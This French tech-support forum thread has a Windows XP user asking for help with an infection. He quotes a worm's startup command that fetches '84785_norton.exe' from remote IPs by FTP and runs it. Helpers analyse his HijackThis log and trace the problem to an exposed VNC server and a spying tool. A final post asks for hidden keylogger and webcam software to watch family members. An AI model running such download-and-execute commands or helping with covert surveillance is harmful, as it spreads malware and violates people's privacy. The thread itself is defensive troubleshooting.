Programme espion

dax -  
méditation22 Messages postés 4 Date d'inscription   Statut Membre Dernière intervention   -
Bonjour,
Depuis plusieurs mois j'assiste impuissant à un piratage de mon ordi. En effet depuis le démarrage j'ai la commande suivante qui s'execute : cmd /c echo OPEN 82.233.255.7 24112>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit.
Je vois des fenetres qui souvrent et qui se ferment, on dirait que qq un est connecté à distance à mon ordi et pourtant ds la configuration j'ai interdit tte connexion à distance. Jai également lancé plusieurs anti virus et spyware doctor mais, aucun aucun anti virus ne m'a permis de me debarrasser de cette saloprie. Avez vous une idée et d'avance merci pour votre aide, je n'ai besoin car je n'arrive plus à travailler tranquillement sur mon PC.
Configuration: Windows XP
Internet Explorer 7.0

20 réponses

  1. dax
     
    Bonjour,
    Merci à tous et à toutes de votre contribution, je vais essayer tt ça ce soir chez moi et j'éspère que j'arriverai à m'n debarrasser. Encore merci et bonne journée.
    1
  2. dax
     
    Bonsoir,
    je viens de lncer hijackthis et voilà le resultat:
    si quelqu'un peut m'aider à comprendre, ça sera avec plaisir. D'avance merci

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 22:00:45, on 05/02/2008
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v7.00 (7.00.6000.16574)
    Boot mode: Normal

    Running processes:
    C:\WINDOW\System32\smss.exe
    C:\WINDOW\system32\csrss.exe
    C:\WINDOW\system32\winlogon.exe
    C:\WINDOW\system32\services.exe
    C:\WINDOW\system32\lsass.exe
    C:\WINDOW\system32\svchost.exe
    C:\WINDOW\system32\svchost.exe
    C:\WINDOW\System32\svchost.exe
    C:\WINDOW\system32\svchost.exe
    C:\WINDOW\system32\svchost.exe
    C:\WINDOW\system32\svchost.exe
    C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
    C:\WINDOW\system32\spoolsv.exe
    C:\Program Files\Gizmo Project\mDNSResponder.exe
    C:\WINDOW\system32\CTsvcCDA.exe
    C:\WINDOW\system32\nvsvc32.exe
    C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
    C:\Program Files\Spyware Doctor\pctsAuxs.exe
    C:\Program Files\Spyware Doctor\pctsSvc.exe
    C:\WINDOW\system32\svchost.exe
    C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
    C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
    C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    C:\WINDOW\System32\alg.exe
    C:\Program Files\Spyware Doctor\pctsTray.exe
    C:\PROGRA~1\TRENDM~1\INTERN~1\PccGuide.exe
    C:\WINDOW\system32\WgaTray.exe
    C:\WINDOW\Explorer.EXE
    C:\WINDOW\system32\ctfmon.exe
    C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
    C:\WINDOW\system32\LVCOMSX.EXE
    C:\Program Files\Logitech\Video\LogiTray.exe
    C:\Program Files\QuickTime\qttask.exe
    C:\Program Files\MSN Messenger\MsnMsgr.Exe
    C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
    C:\Program Files\Creative\Sync Manager Unicode\CTSyncU.exe
    C:\Program Files\Creative\MediaSource5\MtdAcqu.exe
    C:\Program Files\Logitech\Video\FxSvr2.exe
    C:\Program Files\MSN Messenger\usnsvc.exe
    C:\Program Files\MSN Messenger\livecall.exe
    C:\Program Files\VideoLAN\VLC\vlc.exe
    C:\Program Files\Internet Explorer\iexplore.exe
    C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WLLoginProxy.exe
    C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
    C:\WINDOW\system32\wbem\wmiprvse.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://alseraj.net/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
    O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: Download Manager Browser Helper Object - {19C8E43B-07B3-49CB-BFFC-6777B593E6F8} - C:\PROGRA~1\FICHIE~1\fluxDVD\DOWNLO~1\XEBDLH~1.DLL
    O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
    O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar5.dll
    O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
    O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll
    O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar5.dll
    O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
    O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
    O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
    O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
    O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 12\pccguide.exe"
    O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOW\system32\LVCOMSX.EXE
    O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe
    O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
    O4 - HKLM\..\Run: [CanalPlayer] C:\Program Files\Lecteur CANALPLAY\CanalPlayer.exe
    O4 - HKLM\..\Run: [Winspn] C:\Program Files\Winspn\winspn.exe
    O4 - HKLM\..\Run: [Messaging] C:\Program Files\Instant Messenger Names\IM-svr.EXE
    O4 - HKLM\..\Run: [ISTray] "C:\Program Files\Spyware Doctor\pctsTray.exe"
    O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
    O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe
    O4 - HKCU\..\Run: [LogitechSoftwareUpdate] "C:\Program Files\Logitech\Video\ManifestEngine.exe" boot
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOW\system32\ctfmon.exe
    O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_8 -reboot 1
    O4 - HKCU\..\Run: [CTSyncU.exe] "C:\Program Files\Creative\Sync Manager Unicode\CTSyncU.exe"
    O4 - HKCU\..\Run: [MtdAcqu] "C:\Program Files\Creative\MediaSource5\MtdAcqu.exe" /s
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SERVICE LOCAL')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOW\system32\CTFMON.EXE (User 'Default user')
    O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
    O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
    O8 - Extra context menu item: Add to Windows &Live Favorites - https://onedrive.live.com/?id=favorites
    O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
    O8 - Extra context menu item: Ouvrir dans un nouvel onglet d'arrière-plan - res://C:\Program Files\Windows Live Toolbar\Components\fr-fr\msntabres.dll.mui/229?d71c481f205143d2807d08b24c53ee0e
    O8 - Extra context menu item: Ouvrir dans un nouvel onglet de premier plan - res://C:\Program Files\Windows Live Toolbar\Components\fr-fr\msntabres.dll.mui/230?d71c481f205143d2807d08b24c53ee0e
    O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOW\Network Diagnostic\xpnetdiag.exe
    O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOW\Network Diagnostic\xpnetdiag.exe
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O12 - Plugin for .pl: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll
    O15 - Trusted Zone: *.canalplay.com
    O15 - Trusted Zone: *.canalplusactive.com
    O15 - Trusted Zone: *.canalplay.com (HKLM)
    O15 - Trusted Zone: *.canalplusactive.com (HKLM)
    O18 - Protocol: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll
    O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
    O23 - Service: Bonjour Service - Apple Computer, Inc. - C:\Program Files\Gizmo Project\mDNSResponder.exe
    O23 - Service: Boonty Games - BOONTY - C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe
    O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOW\system32\CTsvcCDA.exe
    O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOW\system32\nvsvc32.exe
    O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
    O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
    O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
    O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
    O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
    O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    1
  3. Kokliko Messages postés 4433 Statut Contributeur 749
     
    Bonjour,

    Pour savoir si c'est vraiment un virus qui te fait ce coup, fait un rapport hijackthis et poste le.
    Je peux te dire comment faire, mais je n'ai pas encore acqui les capacités pour l'interpretation que je laisse aux experts de ce forum (grand, très grand merci à eux)

    Télécharge le sur le site dans la rubrique téléchargement sécurité
    Lance le puis:
    clique sur "do a system scan and save logfile" (cf démo)
    faire un copier coller du log entier sur le forum
    Démo : (Merci a Balltrap34 pour cette réalisation)
    http://pageperso.aol.fr/balltrap34/demohijack.htm
    http://www.tutoriaux-excalibur.com/hijackthis.htm
    https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html

    Voilà. J'espère que ma modeste contribution te permettra d'y voir plus clair dans ton problème.

    @+
    0
  4. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  5. argaunotes Messages postés 184 Statut Membre 19
     
    Bonsoir,

    A faire en mode sans échec (F8 au démarrage) avec prise en charge du réseau. Choisir Scanner de sécurité

    http://safety.live.com/site/fr-FR/center/howsafe.htm?s_cid=mscom_msrt

    Bonne chance ;-))
    0
  6. magicien10024 Messages postés 3317 Statut Membre 283
     
    + ca

    http://check.sdv.fr:3658/cgi/scan?
    0
  7. espion3004 Messages postés 8687 Statut Membre 1 434
     
    salut à tous, ciblons le problème par un hijackthis !
    0
  8. Anonyme
     
    Salut ^ ^)

    J'espère que tu ne te balades pas à poil devant ta webcam de chez Logitech ?!

    C:\WINDOW\system32\LVCOMSX.EXE

    O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOW\system32\LVCOMSX.EXE

    Merci !
    0
  9. Anonyme
     
    Salut ^ ^)

    C'est toi "dax", qui a installé 'Espion Pro' ?!

    http://www.01net.com/windows/Utilitaire/cryptage_et_securite/fiches/28352.html

    O4 - HKLM\..\Run: [Winspn] C:\Program Files\Winspn\winspn.exe

    "Espion est un logiciel permettant de surveiller l'utilisation de votre ordinateur en votre absence. Il prend des captures d'écran à intervalles réguliers, que vous déterminez avant d'éteindre votre machine. Il permet également d'enregistrer toutes les touches frappées sur le clavier. Il vous suffit d'entrer les options de sauvegarde."

    Pour réinstaller ce logiciel, ET SURTOUT POUR LE DÉSINSTALLER ; si ça peut aider :

    http://forum.telecharger.01net.com/forum/high-tech/LOGICIELS/Windows-et-Logiciels/espion-sujet_87424_1.htm

    Merci !
    0
  10. espion3004 Messages postés 8687 Statut Membre 1 434
     
    Que faut il faire Anonyme ? alors ?
    0
  11. Anonyme
     
    Salut ^ ^)

    Déjà, placer un chiffon (qui ne raye pas) sur ta webcam "dax" ; avec 'micro intégré' ? = encore un problème le micro !
    => Où mieux, la débrancher ... pour évité l'espionnage audio/vidéo .

    Pour le logiciel 'Espion Pro', si tu ne l'a pas installé toi-même 'dax', il faut vérifié quel logiciel '84785_norton.exe', serait téléchargé ...
    => Pour voir si c'est pas justement ce logiciel ou un autre ; caché derrière le nom '84785_norton.exe' .

    Et pour la désinfection ; je fais confiance à 'espion3004' :) :

    Est-ce que tu pourrais télécharger le fichier 'espion3004', si la commande fourni par "dax" fonctionne ?
    => De façon sécurisé pour ton pc bien-sûr ... pour voir quel logiciel c'est .

    * "dax" pourrait redonner la commande exacte qui est envoyée, et nous dire que c'est pas son ip à lui o_O ;)

    "j'ai la commande suivante qui s'exécute : cmd /c echo OPEN 82.233.255.7 24112>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit. Je vois des fenêtres qui s'ouvrent et qui se ferment" ...

    Merci !
    0
  12. Anonyme
     
    .

    "j'ai la commande suivante qui s'exécute : cmd /c echo OPEN 82.233.255.7 24112>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit. Je vois des fenêtres qui s'ouvrent et qui se ferment" ...

    * Whois : https://www.frameip.com/whois/

    Voici les résultats du whois pour l'adresse IP 82.233.255.7

    C'est le serveur whois.ripe.net qui possède l'information suivante :

    % This is the RIPE Whois query server #3.
    % The objects are in RPSL format.
    %
    % Rights restricted by copyright.
    % See http://www.ripe.net/db/copyright.html

    % Note: This output has been filtered.
    % To receive output for a database update, use the "-B" flag.

    % Information related to '82.233.252.0 - 82.233.255.255'

    inetnum: 82.233.252.0 - 82.233.255.255
    netname: FR-PROXAD-ADSL
    descr: Proxad / Free SAS
    descr: Static pool (Freebox)
    descr: evr91-2 (corbeil)
    descr: NCC#2003105812
    country: FR
    admin-c: ACP23-RIPE
    tech-c: TCP8-RIPE
    status: ASSIGNED PA
    remarks: Spam/Abuse requests: mailto:abuse@proxad.net
    mnt-by: PROXAD-MNT
    source: RIPE # Filtered

    role: Administrative Contact for ProXad
    address: Free SAS / ProXad
    address: 8, rue de la Ville L'Eveque
    address: 75008 Paris
    phone: +33 1 73 50 20 00
    fax-no: +33 1 73 92 25 69
    remarks: trouble: Information: http://www.proxad.net/
    remarks: trouble: Spam/Abuse requests: mailto:abuse@proxad.net
    admin-c: RA999-RIPE
    tech-c: FG4214-RIPE
    nic-hdl: ACP23-RIPE
    mnt-by: PROXAD-MNT
    source: RIPE # Filtered
    abuse-mailbox: abuse@proxad.net

    role: Technical Contact for ProXad
    address: Free SAS / ProXad
    address: 8, rue de la Ville L'Eveque
    address: 75008 Paris
    phone: +33 1 73 50 20 00
    fax-no: +33 1 73 92 25 69
    remarks: trouble: Information: http://www.proxad.net/
    remarks: trouble: Spam/Abuse requests: mailto:abuse@proxad.net
    admin-c: RA999-RIPE
    tech-c: FG4214-RIPE
    nic-hdl: TCP8-RIPE
    mnt-by: PROXAD-MNT
    source: RIPE # Filtered
    abuse-mailbox: abuse@proxad.net

    % Information related to '82.224.0.0/11AS12322'

    route: 82.224.0.0/11
    descr: ProXad network / Free SAS
    descr: Paris, France
    origin: AS12322
    mnt-by: PROXAD-MNT
    source: RIPE # Filtered

    Merci !
    0
  13. Anonyme
     
    Salut ^ ^)

    Après lecture sur d'autres forums et aides ; avec présence de 'Malekal_morte', mais il ne parle pas de vnc :

    https://forum.hardware.fr/hfr/WindowsSoftware/Securite/intrusion-vnc-sujet_255658_1.htm

    http://forum.telecharger.01net.com/telecharger/securite_virus_et_assimiles/trojan_et
    _spywares/des_lignes_de_commande_apparaissent__urgent-408983/messages-1.html

    http://forum.telecharger.01net.com/telecharger/securite_virus_et_assimiles/trojan_et
    _spywares/lancements_intempestifs_-414187/messages-1.html

    https://www.clubic.com/forum/t/piratage-ou-pas-piratage/159713

    Le serveur 'VNC' semble être un point faible de sécurité ; le point faible ...

    Tu l'as sur ton pc 'dax' ; VNC :

    C:\Program Files\RealVNC\VNC4\WinVNC4.exe

    O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe

    Désinstalles ou vérifies les paramètres de sécurités du logiciel VNC que TU?! a installé

    !! Les pc qui vous attaques, peuvent êtres des 'PC Zombis' ; et leur propriétaire n'en n'ont peut-être pas conscience.
    => J'espère qu'ils n'en n'ont réellement pas conscience pour ne pas laisser faire.

    * L'utilisateur dont l'ip fixe est dans la commande fourni par 'dax' n'est peut-être pas coupable ; sauf à avoir un PC peut-être Zombi et donc pas sécurisé .

    Dégroupage Free : Liste complète des Dslam :
    http://corindon.free.fr/Dslamcomp.html
    Dpt ; Ville ; NRA ; Nom du NRA ; Dslam ; Adresse IP Dslam ; #
    91 ; ZP Paris 91 ; EVR91 ; Evry ; evr91-2 ; 213.228.23.22 ; 1593

    Dégroupage Free : connexions des DSLAM :
    1. http://francois04.free.fr/connex_dslam.php?ip=82.233.255.7&periode=T
    L'adresse 82.233.255.7 correspond (normalement) à la carte n° 10 du Dslam (chipset n° 0, position n° 6) - Dslam V2
    2. http://francois04.free.fr/nav.php?niv=5&nom=evr91-2 (cliquez sur 'evr91-2')

    Merci !
    0
  14. dax
     
    Bonjour,
    D'abord merci à tous et à toutes pour vos réponse. Deuxiement, je vous rassure je ne me promène pas à poi chez moi ce n'est pas mon truc!!!. Pour l'adresse IP, ce n'est pas la mienne je le confirme. Je 'ai jamais installé de programme espion chez moi, je vais le desinstaller. Mais hélas, je suis sur que qq un s'amuse à distance avec mon ordi je vois des fenetres s'ouvrire et se fermer ttes seules. Voici la commande qui se lance tte seules dés le demarrage et ensuite à des intervalles de temps differents ça peut etre ttes les 30 secondes ou les 2 min:
    ftp> OPEN 82.233.21.240 5426
    Connecté à 82.233.21.240.
    220 Microsoft FTP Service.
    ftp> GET 84785_norton.exe
    200 PORT command successful.
    150 Opening BINARY mode data connection.
    le fichiet 84785_norton.exe est une application qui fait 0ko, je l'ai supprimé plusieurs fois mais il est recrée dés que la commande :
    cmd /c echo OPEN 82.233.103.227 22176>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit
    s'execute. Mais de toute façon je suis sur qu'il y a qq qui s'amuse avec mon ordi, je vois des fenetres qui s'ouvrent ttes seules comme la corbeille, mon ZEN V series media explorer
    Merci et trés bonne soirée
    0
  15. magicien10024 Messages postés 3317 Statut Membre 283
     
    as tu configuré correctement ton firewall ?
    as tu installé zeb protect ?
    0
  16. dax
     
    Bonsoir,
    Pour le firewall, il me semble que je l'ai bien configuré, et je n'ai pas zeb protect, ou je peux le trouver?il y a un mois mon anti virus a detecté un programme espion WORM_SDBOT.FGK, il n'a pas reussi à le supprimer, j 'ai supprimé le fichier à la main. Mais j'ai remarqué qq chose depuis hier, anonyme m'a mis sur la piste de VNC, j' ai desinstallé ce logiciel, et depuis la fameuse commande ne se lance plus, je ne crie pas victoire pour autant. J'attends de voir si c'est vraiment ça la cause ou pas. En tout cas merci infiniment à vous tous, c'est tres sympa de se sentir aidée et je vous souhaite une agreable soirée.
    0
  17. Anonyme
     
    Salut ^ ^)

    C'était en gras au Post #13 ;) :

    Désinstalles ou vérifies les paramètres de sécurités du logiciel VNC que TU ?! a installé !

    Merci !
    0
  18. dax
     
    Bonjour,
    Depuis que j'ai desinstallé VNC4, je ne vois plus de "bizareries" sur mon pc, est ce que le pb est definitivement résolu, je l'espère. ça fait plaisir de pouvoir travailler ss etre dérangé. J ai installé zeb protect merci magicien, anonyme et ts les autres pour votre aide.
    Bonne journée
    0
  19. méditation22 Messages postés 4 Date d'inscription   Statut Membre Dernière intervention  
     
    bonjour a tous escuser moi d'arriver c'est tout le contraire du sujet mais a ussage personnel vous m'avez l'air de vous y connaitre voilà je voudrais pirater mon propre pc c'est a dire le mettre sous surveillance car j'ai des enfants et un homme et j'aimerais impeut surveiller tout ça ! trouver un logiciel webcam invissible ou clavier enregistrer sans virus ! ceci n'est ppur haker les gens c'est pour mon entourage afin de proteger mon cocon svp pouvez vous m'aider
    0